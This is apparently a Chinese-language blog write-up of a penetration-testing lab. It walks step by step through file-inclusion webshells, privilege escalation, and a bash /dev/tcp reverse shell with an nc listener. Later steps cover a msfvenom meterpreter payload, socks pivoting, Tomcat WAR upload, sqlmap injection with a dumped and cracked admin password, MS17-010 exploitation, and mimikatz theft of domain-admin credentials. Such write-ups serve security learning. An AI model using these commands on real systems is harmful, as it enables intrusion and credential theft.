平时不怎么习惯做记录，导致很多时候在实际渗透中，遇到了某些问题的时候，还得去咨询度娘，谷锅，所以，现在决定好好纠正一下这个问题，同时也希望分享给爱好安全的同学们。

    这个渗透实验做了蛮久了，当时做的时候呢，也就做了点简单的记录。emmmm，废话也不多说了，开始进入正题吧！

    这是我画的一个十分拙劣的拓扑图！！！！！

拓扑图

    1.我们目前能访问的就只有192.168.5.10这个网站，进入网站后，经过简单的浏览页面，可以发现，存在文件包含，关于文件包含的利用方法有很多，这里我也就不做过多阐述了。

    2.现在就来测试一下是否存在漏洞，在这里我使用的是PHP的伪协议，可以很直观的看到，这里确实是存在漏洞的

    3.确定存在漏洞之后，直接使用远程文件包含来获取shell，因为是实验环境，所以直接在本地开启http服务，并在网站目录下，创建一个一句话脚本，注意这个脚本后缀不能是被php所解析的后缀。

    4.使用菜刀进行连接，地址就填远程文件包含的那个地址

    5.连接终端，查询一些基本信息，原谅我连whoami都打错了一次，233333，可以看到是一个低权限用户，在查看内核，使用对应的exp进行提权

    6.因为这个菜刀的终端用起来不太方便，所以我在做提权的时候，做了一次反弹shell，不过忘记截图了，具体的命令是这样的

目标端：/bin/bash/ -i > /dev/tcp/192/168.5.107/7777 0<&1 2>&1

攻击端：nc -lvnp 7777

    7.在获取反弹的shell之后，就可以使用对应的exp进行提权了，不过需要注意的事，上传exp之后，需要查看是否有运行权限，如果没有运行权限的话，使用 chmod u+x 文件名 赋予其可执行权限。

    8.在提权成功之后，我直接创建一个用户，并添加到root组，登陆ssh

9.因为是需要做内网渗透，那么不可或缺神器的就是MSF，首先生成一个MSF的后门

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.5.107 LPORT=4444 -f elf >shell.elf

    开启监听：

    use exploit/multi/handler

    set PAYLOAD linux/x86/meterpreter/reverse_tcp

    set LHOST 0.0.0.0

    exploit

    10.已经得到反弹回来的shell，那么现在应该做的就是添加路由对其内网进行探测

添加路由

    11.在对内网探测的时候，我偷了个懒，直接上传了nmap的源码到边界服务器，不过在实战中可不能这么做。以下就是192.168.6.0/24网段中的机器，OK，现在来逐个击破

    12.可以看到，16,17这个两个IP开放了80端口，但是其处于内网之中，我们是无法访问到的，那么这个时候，就可以使用ew反手给它一套连招，让它乖乖就范。

    在边界服务器，开启socks代理 ./ew -s ssocksd -l 1080

13.我使用的代理工具SocksCap，添加服务器：192.168.5.10，连接socks服务，便可访问其内网了，这款工具我个人感觉挺好用的。大家有兴趣的话，可以试一试。

14.访问192.168.6.16这个内网的80端口后，发现没有任何可以利用的地方，但是我突然看到之前的扫描结果，发现开放了8080端口，这个我相信大家都很熟悉吧，一进去，果然就是tomcat的主页，通过弱口令，成功进入到了配置页面。直接进去正题，找到war包上传地点，本地编译war包，上传，拿到shell。

    因为很多tomcat部署的时候，都是高权限用户部署的，所以其默认继承于root，不需要进行提权。

    拿到flag，其实每个站点都有两个flag，不过我很多都忘记截图了，手动滑稽- -！

15.开始渗透192.168.6.17这个站点，是一个内部OA系统，尝试爆破没有成功，目录扫描没有可以用页面，无奈之下，上了wvs漏扫，找到一个sql注入点。这个页面扫描目录的时候，也扫出来过，但是没上wvs的时候，我怎么也没想到这里会存在注入 = =

16.直接使用sqlmap进行注入，这里需要使用代理，因为之前socks断了一次，所以我换了个端口

17.拿到管理员账号，随手往MD5网站一丢，解密出来密码为：37s984pass，同时还在数据库中找到了另外一个flag

    Database: my_oa

    Table: admin

    [1 entry]

    +----+----------------------------------+----------+

    | id | password                        | username |

    +----+----------------------------------+----------+

    | 1  | 29acd667cdbee1116d365727ca6821d3 | admin    |

    +----+----------------------------------+----------+

18.本来想尝试直接用sqlmap写shell的，但是发现没有写入的权限，所以就放弃了，拿到密码，登陆OA管理系统，找到文件上传页面，直接上传php马，没有任何返回信息，然后我又上传了一次正常的图片，发现其命名规则貌似是根据系统返回时间来进行文件重命名的。

19.这个时候直接使用burp抓包上传，这里还是需要注意，burp也是需要使用边界服务器的socks代理的，不然也无法直接抓包上传的。这里重新上传一次大马，根据返回时间，访问大马

20.在查看网卡的时候，发现没有更深层次的主机的，那我也就不用提权了，翻阅目录拿到flag走人

21.接下来就是192.168.6.200这个主机了，看到445端口，第一反应就是ms17-010，刚刚我们已经做过路由了，那么直接执行 

    use exploit windows/smb/ms17_010_psexec

    show PAYLOAD

    找到下面箭头所指的这个payload

   22.设置目标机ip为192.168.6.200 ，设置反弹shell的ip与端口为我们控制的服务器

  23.在执行run之前，先在已经控制的边界服务器（192.168.6.10）上，用nc监听4555端口，可以看到，已经成功的将192.168.6.200的shell反弹回来

25.既然已经拿到高权限shell了，先添加一个用户再说

26.使用一些常用的域命令，收集一些信息

查看用户所属域

查询域管理

27.使用新创建的用户，登陆对方3389，因为是域环境，所以在连接3389的时候需要添加域的名称

28.上传mimikatz到192.168.5.10这个边界服务器之后，再下载下来，并且，虽然当前账号是在admin用户组中，但是mimikatz必须要最高权限运行。所以，在这里我也上传了一个MS14-058的exp，用来执行mimikatz

    可以看到mimikatz已经成功执行了

运气也比较好，抓到了域管理的密码

29.在使用抓取到的域管理的密码登陆当前主机，拿到flag

30.查看一下网卡信息，可以看到，还有内网

31.查看网络，尝试连接win那台主机，发现对方，为开启3389，但是我们现在有域控密码，直接使用IPC$进行连接，在配合开启3389的vbs脚本，直接打开对方3389，但是我忘记截图了，不过这里有个连接可以参考一下：https://wenku.baidu.com/view/f965f6ece009581b6bd9eb2c.html

32.登陆成功，拿到flag

至此这个实验就算基本完成了✿✿ヽ(°▽°)ノ✿。本人技术不精，如有错误的地方，欢迎指正。